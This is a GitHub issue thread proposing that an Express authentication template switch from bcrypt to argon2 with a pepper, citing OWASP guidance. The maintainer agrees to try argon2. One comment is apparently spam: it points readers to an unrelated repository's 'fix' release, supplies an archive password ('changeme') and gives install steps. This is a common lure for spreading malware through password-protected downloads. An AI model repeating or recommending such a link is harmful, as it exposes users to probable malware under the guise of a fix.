### ISSUE TITLE
Use argon2 instead of bcrypt along with a pepper value

### ISSUE THREAD

**Issue by rushabhhere** [MananGandhi1810/express-auth-template#7]
- argon2 is generally considered to be more secure than bcrypt nowadays.
- the npm package for argon2 (https://www.npmjs.com/package/argon2) is much more maintained than that of bcrypt (https://www.npmjs.com/package/bcrypt). You can see the last published time.
- argon2 has sensible defaults and stores the salt value in the password itself, so you don't need to store it separately and no need to bother with configurations.

I also suggest using a pepper value.

Explanation of all this can be found here: https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MananGandhi1810** [comment]
Will try using argon2
